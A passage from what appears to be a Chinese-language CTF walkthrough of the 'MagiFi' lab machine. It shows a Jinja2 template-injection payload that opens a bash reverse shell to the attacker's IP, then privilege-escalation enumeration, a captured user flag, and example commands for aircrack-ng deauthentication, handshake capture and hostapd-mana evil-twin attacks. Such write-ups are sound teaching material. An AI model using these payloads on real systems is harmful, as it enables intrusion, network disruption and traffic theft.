Name]<\/code><\/pre>\n\u6ce8\u610f\u5904\u7406\u4e00\u4e0b\u5b57\u4f53\u54e6\uff0c\u548c\u6a21\u677f\u4e00\u81f4\uff01\uff08\u683c\u5f0f\u5237\uff09\u7136\u540e\u5bfc\u51fapdf<\/code>\u8fdb\u884c\u4e0a\u4f20\uff1a<\/p>\n<\/div><\/p>\n\u53ef\u4ee5\u8fdb\u884c\u6a21\u677f\u6ce8\u5165\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff01\uff01\uff01\uff01\u4f46\u662f\u6211\u8fd9\u8fb9\u6267\u884c\u4e86\u534a\u5929\uff0c\u5c31\u662f\u5f39\u4e0d\u8fc7\u6765\uff0c\u6211\u5728\u6363\u9f13\u65f6\u53d1\u73b0\u4e86\u4e00\u4e2a\u6709\u610f\u601d\u7684\u5730\u65b9\uff0c\u6253\u7a7a\u683c\u6362\u884c\u4ee5\u540e\u51fa\u6765\u7684\u4e0d\u662f\u7a7a\u683c\uff0c\u662f\u4e2a\u83ab\u540d\u5176\u5999\u7684\u5360\u4f4d\u7f6e\u7684\u5730\u65b9\uff0c\u6b64\u65f6\u6309\u5220\u9664\u4f1a\u76f4\u63a5\u5220\u6389\u4e0a\u9762\u7684\u5185\u5bb9\u3002\u3002\u3002\u3002\u6240\u4ee5\u54b1\u4eec\u8981\u5c0f\u5fc3\u3002\u6709\u7a7a\u683c\u7684\u5730\u65b9\u4e0d\u8981\u6362\u884c\uff0c\u5426\u5219\u4f1a\u9ed8\u8ba4\u5c06\u4e0a\u4e0b\u4fe9\u76f4\u63a5\u62fc\u5230\u4e00\u8d77\u4f7f\u547d\u4ee4\u5931\u6548\u3002\u3002\u3002\u3002\u65b9\u6cd5\u5f53\u7136\u662f\u6709\u6ef4\uff0c\u7528\u6362\u884c\u5c06\u547d\u4ee4\u622a\u65ad\u5373\u53ef\u6267\u884c\uff0c\u4f46\u662f\u6a21\u677f\u8bbe\u7f6e\u4e86\uff0c\u5c06\u5355\u8bcd\u653e\u5728\u4e00\u8d77\u4e0d\u88ab\u6362\u884c\u622a\u65ad\u6240\u4ee5\u6211\u4eec\u8981\u4eba\u4e3a\u622a\u65ad\u6389\uff0c\u8fd8\u6ca1\u5230\u6362\u884c\u5c31\u7528\u7a7a\u683c\u586b\u5145\u76f4\u5230\u6362\u884c\u3002\u3002\u3002\u3002<\/p>\n
Birthday: {{ cycler.__init__.__globals__.os.popen('bash -c "bash -i >& \/dev\/tcp\/192.168.10.107\/1234 0>&1"').read() }}<\/code><\/pre>\n<\/div>
\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u65e0\u7ebf\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\uff08\u65b9\u6cd5\u4e00\u524d\u7f6e\u64cd\u4f5c\uff09<\/h3>\n\u4fe1\u606f\u641c\u96c6<\/h4>\n(remote) harry_potter@MagiFi:\/home\/harry_potter\/Hogwarts_web$ cd ~\n(remote) harry_potter@MagiFi:\/home\/harry_potter$ cat \/etc\/passwd | grep sh | cut -d: -f1\nroot\nfwupd-refresh\nsshd\nrubeus.hagrid\nalbus.dumbledore\nminerva.mcgonagall\ntom.riddle\nharry_potter\n(remote) harry_potter@MagiFi:\/home\/harry_potter$ ls -la\ntotal 28\ndrwxr-xr-x 3 harry_potter harry_potter 4096 Feb 4 10:04 .\ndrwxr-xr-x 7 root root 4096 Sep 27 2024 ..\nlrwxrwxrwx 1 root root 9 Sep 27 2024 .bash_history -> \/dev\/null\n-rw-r--r-- 1 harry_potter harry_potter 220 Feb 25 2020 .bash_logout\n-rw-r--r-- 1 harry_potter harry_potter 3771 Feb 25 2020 .bashrc\ndrwxr-xr-x 5 harry_potter harry_potter 4096 Sep 26 2024 Hogwarts_web\n-rw-r--r-- 1 harry_potter harry_potter 807 Feb 25 2020 .profile\n-rw-r--r-- 1 harry_potter harry_potter 43 Feb 4 10:04 user.txt\n(remote) harry_potter@MagiFi:\/home\/harry_potter$ cat user.txt \nhogwarts{ea4bc74f09fb69771165e57b1b215de9}\n(remote) harry_potter@MagiFi:\/home\/harry_potter$ sudo -l\nMatching Defaults entries for harry_potter on MagiFi:\n env_reset, mail_badpass, secure_path=\/usr\/local\/sbin\\:\/usr\/local\/bin\\:\/usr\/sbin\\:\/usr\/bin\\:\/sbin\\:\/bin\\:\/snap\/bin\n\nUser harry_potter may run the following commands on MagiFi:\n (root) NOPASSWD: \/usr\/sbin\/aireplay-ng, \/usr\/sbin\/airmon-ng, \/usr\/sbin\/airodump-ng, \/usr\/bin\/airdecap-ng, \/usr\/bin\/hostapd-mana<\/code><\/pre>\n\u770b\u4e00\u4e0b\u662f\u4e9b\u5565\u3002\u3002\u3002\u3002\u3002<\/p>\n
\n\u4e00\u3001\/usr\/sbin\/aireplay-ng<\/code><\/h4>\n\u529f\u80fd<\/strong>\uff1a\u5c5e\u4e8eAircrack-ng\u5957\u4ef6\uff0c\u7528\u4e8e\u5411\u65e0\u7ebf\u7f51\u7edc\u6ce8\u5165\u6570\u636e\u5305\u4ee5\u751f\u6210\u6d41\u91cf\uff0c\u8f85\u52a9\u7834\u89e3WPA\/WPA2\u5bc6\u94a5\u3002
\n\u200b\u6838\u5fc3\u7528\u9014<\/strong>\u200b\uff1a<\/p>\n\n- \u652f\u6301\u591a\u79cd\u653b\u51fb\u6a21\u5f0f\uff0c\u5982\u89e3\u9664\u8ba4\u8bc1\uff08Deauthentication\uff09\u3001\u4f2a\u9020\u8ba4\u8bc1\uff08Fake Authentication\uff09\u3001ARP\u8bf7\u6c42\u91cd\u653e\u7b49<\/li>\n
- \u901a\u8fc7\u751f\u6210\u6d41\u91cf\u6355\u83b7WPA\u63e1\u624b\u5305\uff0c\u4e3a\u540e\u7eed\u7834\u89e3\u63d0\u4f9b\u6570\u636e\u652f\u6301\u3002<\/li>\n<\/ul>\n
# \u5f3a\u5236\u89e3\u9664\u8ba4\u8bc1\u653b\u51fb\uff08\u4f7f\u5ba2\u6237\u7aef\u65ad\u5f00\u8fde\u63a5\uff09\naireplay-ng -0 10 -a BSSID -c STATION wlan0mon<\/code><\/pre>\n
\n\u4e8c\u3001\/usr\/sbin\/airmon-ng<\/code><\/h4>\n\u529f\u80fd<\/strong>\uff1a\u7ba1\u7406\u65e0\u7ebf\u7f51\u5361\u7684\u76d1\u63a7\u6a21\u5f0f\uff08Monitor Mode\uff09\uff0c\u7528\u4e8e\u6355\u83b7\u6240\u6709\u7ecf\u8fc7\u7f51\u5361\u7684\u6570\u636e\u5305\u3002
\n\u200b\u6838\u5fc3\u7528\u9014<\/strong>\u200b\uff1a<\/p>\n\n- \n
\u542f\u52a8\/\u505c\u6b62\u76d1\u63a7\u6a21\u5f0f\uff1aairmon-ng start wlan0<\/code>\u3002<\/p>\n<\/li>\n- \n
\u68c0\u67e5\u5e72\u6270\u8fdb\u7a0b\uff08\u5982\u7f51\u7edc\u7ba1\u7406\u5668\uff09\u5e76\u7ec8\u6b62\uff1a<\/p>\n
airmon-ng check kill<\/code><\/pre>\n\u9002\u7528\u573a\u666f\uff1a\u65e0\u7ebf\u7f51\u7edc\u6e17\u900f\u6d4b\u8bd5\u3001\u6d41\u91cf\u55c5\u63a2\u3002<\/p>\n<\/li>\n<\/ul>\n
\n\u4e09\u3001\/usr\/sbin\/airodump-ng<\/code><\/h4>\n\u529f\u80fd<\/strong>\uff1a\u65e0\u7ebf\u7f51\u7edc\u626b\u63cf\u4e0e\u6570\u636e\u5305\u6355\u83b7\u5de5\u5177\uff0c\u5e38\u7528\u4e8e\u8bc6\u522b\u76ee\u6807\u7f51\u7edc\u53ca\u6536\u96c6\u63e1\u624b\u5305\u3002
\n\u200b\u6838\u5fc3\u529f\u80fd<\/strong>\u200b\uff1a<\/p>\n\n- \u5b9e\u65f6\u663e\u793aAP\u7684SSID\u3001BSSID\u3001\u4fe1\u53f7\u5f3a\u5ea6\u3001\u52a0\u5bc6\u65b9\u5f0f\u7b49\u4fe1\u606f<\/li>\n
- \u652f\u6301\u6309\u9891\u9053\u3001BSSID\u8fc7\u6ee4\uff0c\u4f18\u5316\u6570\u636e\u6355\u83b7\u6548\u7387\u3002<\/li>\n<\/ul>\n
# \u9501\u5b9a\u76ee\u6807AP\u5e76\u6355\u83b7\u63e1\u624b\u5305\nairodump-ng --bssid 00:11:22:33:44:55 -c 6 --write capture wlan0mon<\/code><\/pre>\n
\n\u56db\u3001\/usr\/bin\/airdecap-ng<\/code><\/h4>\n\u529f\u80fd<\/strong>\uff1a\u89e3\u5bc6WPA\/WPA2\u52a0\u5bc6\u7684\u6355\u83b7\u6587\u4ef6\uff08\u5982.cap<\/code>\u6216.ivs<\/code>\uff09\uff0c\u63d0\u53d6\u660e\u6587\u6d41\u91cf\u3002
\n\u200b\u6838\u5fc3\u7528\u9014<\/strong>\u200b\uff1a<\/p>\n\n- \u9700\u63d0\u4f9b\u76ee\u6807\u7f51\u7edc\u7684ESSID\u548c\u5bc6\u7801\u8fdb\u884c\u89e3\u5bc6\u3002<\/li>\n
- \u652f\u6301\u5265\u79bb\u65e0\u7ebf\u534f\u8bae\u5934\uff0c\u751f\u6210\u7eaf\u6570\u636e\u6587\u4ef6<\/li>\n<\/ul>\n
airdecap-ng -e \"MyNetwork\" -p password123 capture.cap<\/code><\/pre>\n
\n\u4e94\u3001\/usr\/bin\/hostapd-mana<\/code><\/h4>\n\u529f\u80fd<\/strong>\uff1a\u6076\u610f\u63a5\u5165\u70b9\uff08Evil Twin\uff09\u5de5\u5177\uff0c\u7528\u4e8e\u521b\u5efa\u4eff\u5192Wi-Fi\u70ed\u70b9\u5b9e\u65bd\u4e2d\u95f4\u4eba\u653b\u51fb\u3002
\n\u200b\u6838\u5fc3\u529f\u80fd<\/strong>\u200b\uff1a<\/p>\n\n- \u7ed3\u5408Karma\u653b\u51fb\uff0c\u81ea\u52a8\u54cd\u5e94\u5ba2\u6237\u7aef\u63a2\u6d4b\u8bf7\u6c42\uff0c\u4f2a\u9020\u5408\u6cd5\u70ed\u70b9<\/li>\n
- \u652f\u6301SSL\u5265\u79bb\uff08SSLstrip\uff09\u3001Cookie\u7a83\u53d6\u7b49\u653b\u51fb\u3002
\n\u200b\u98ce\u9669\u63d0\u793a<\/strong>\u200b\uff1a<\/li>\n- \u9700\u914d\u5408
hostapd<\/code>\u914d\u7f6e\u6587\u4ef6\u53caDHCP\u670d\u52a1\u5b9e\u73b0\u9493\u9c7c\u7f51\u7edc\u3002<\/li>\n- \u53ef\u80fd\u88ab\u7528\u4e8e\u975e\u6cd5\u5165\u4fb5\uff0c\u9700\u4e25\u683c\u6388\u6743\u4f7f\u7528\u3002<\/li>\n<\/ul>\n<\/blockquote>\n
\u770b\u6765\u8fd9\u4e00\u5173\u548c\u7f51\u7edc\u6709\u5173\uff0c\u770b\u4e00\u4e0b\u76f8\u5173\u914d\u7f6e\uff1a<\/p>\n
(remote) harry_potter@MagiFi:\/home\/harry_potter$ ip a\n1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n inet 127.0.0.1\/8 scope host lo\n valid_lft forever preferred_lft forever\n inet6 ::1\/128 scope host \n valid_lft forever preferred_lft forever\n2: enp0s3: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000\n link\/ether 08:00:27:1d:e9:1f brd ff:ff:ff:ff:ff:ff\n inet 192.168.10.100\/24 brd 192.168.10.255 scope global dynamic enp0s3\n valid_lft 5498sec preferred_lft 5498sec\n inet6 fd00:4c10:d50a:f900:a00:27ff:fe1d:e91f\/64 scope global dynamic mngtmpaddr \n valid_lft 85671sec preferred_lft 13671sec\n inet6 fe80::a00:27ff:fe1d:e91f\/64 scope link \n valid_lft forever preferred_lft forever\n14: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default \n link\/ether 02:42:f2:41:3d:5f brd ff:ff:ff:ff:ff:ff\n inet 172.17.0.1\/16 brd 172.17.255.255 scope global docker0\n valid_lft forever preferred_lft forever\n15: wlan0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 02:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff\n16: wlan1: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 02:00:00:00:01:00 brd ff:ff:ff:ff:ff:ff\n17: wlan2: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 02:00:00:00:02:00 brd ff:ff:ff:ff:ff:ff\n18: wlan3: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 02:00:00:00:03:00 brd ff:ff:ff:ff:ff:ff\n19: wlan4: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 02:00:00:00:04:00 brd ff:ff:ff:ff:ff:ff\n20: wlan5: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 02:00:00:00:05:00 brd ff:ff:ff:ff:ff:ff\n21: wlan6: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 02:00:00:00:06:00 brd ff:ff:ff:ff:ff:ff\n75: wlan60: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ether 02:00:00:00:3c:00 brd ff:ff:ff:ff:ff:ff\n76: hwsim0: <BROADCAST,MULTICAST> mtu 1500 qdisc noop state DOWN group default qlen 1000\n link\/ieee802.11\/radiotap 12:00:00:00:00:00 brd ff:ff:ff:ff:ff:ff\n78: veth1@if77: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000\n link\/ether fa:4a:cb:00:bb:8e brd ff:ff:ff:ff:ff:ff link-netnsid 0\n inet 10.200.1.1\/24 scope global veth1\n valid_lft forever preferred_lft forever\n inet6 fe80::f84a:cbff:fe00:bb8e\/64 scope link \n valid_lft forever preferred_lft forever\n80: veth2@if79: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000\n link\/ether f6:01:ca:1d:4f:6e brd ff:ff:ff:ff:ff:ff link-netnsid 1\n inet 10.200.2.1\/24 scope global veth2\n valid_lft forever preferred_lft forever\n inet6 fe80::f401:caff:fe1d:4f6e\/64 scope link \n valid_lft forever preferred_lft forever<\/code><\/pre>\n\u5b58\u5728\u5927\u91cf\u7f51\u5361\u3002\u3002\u3002\u3002\u3002\u4e14\u6709\u4e00\u4e2adocker<\/code>\u7f51\u5361\u3002\u5c1d\u8bd5\u770b\u4e00\u4e0b\u6709\u54ea\u4e9b\u4f7f\u7528\u65b9\u5f0f<\/p>\n\u4f46\u5c31\u8fd9\u4e48\u770b\u7740\u8fd8\u662f\u4e00\u5934\u96fe\u6c34\uff0c\u770b\u4e00\u4e0b\u6709\u65e0\u76f8\u5173\u8d44\u6599\uff1a<\/p>\n
\nhttps:\/\/github.com\/ricardojoserf\/wifi-pentesting-guide<\/a><\/p>\nhttps:\/\/book.hacktricks.wiki\/en\/generic-methodologies-and-resources\/pentesting-wifi\/index.html<\/a><\/p>\nhttps:\/\/www.netprojnetworks.com\/creating-fake-certificates-hostapd-mana-hostapd\/<\/a><\/p>\n
![\"image-20250621131955485\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506222338992.png\")
<\/div><\/p>\n![\"image-20250621132055517\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506222338993.png\")
<\/div><\/p>\n![\"image-20250621132347298\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506222338994.png\")
<\/div><\/p>\n![\"image-20250621132606329\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506222338995.png\")
<\/div><\/p>\n![\"image-20250621134358625\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506222338996.png\")
<\/div><\/p>\n![\"image-20250621153847685\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506222338997.png\")
<\/div>![\"image-20250621154042398\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506222338998.png\")
<\/div><\/p>\n![\"image-20250621215627896\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506222338999.png\")
<\/div><\/p>\n![\"image-20250621215735248\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506222338000.png\")
<\/div><\/p>\n![\"aaa\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506222338001.png\")
<\/div><\/p>\n![\"image-20250621224527359\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506222338002.png\")
<\/div><\/p>\n![\"image-20250622095602424\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506222338003.png\")
<\/div><\/p>\n![\"image-20250622103137042\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506222338004.png\")
<\/div><\/p>\n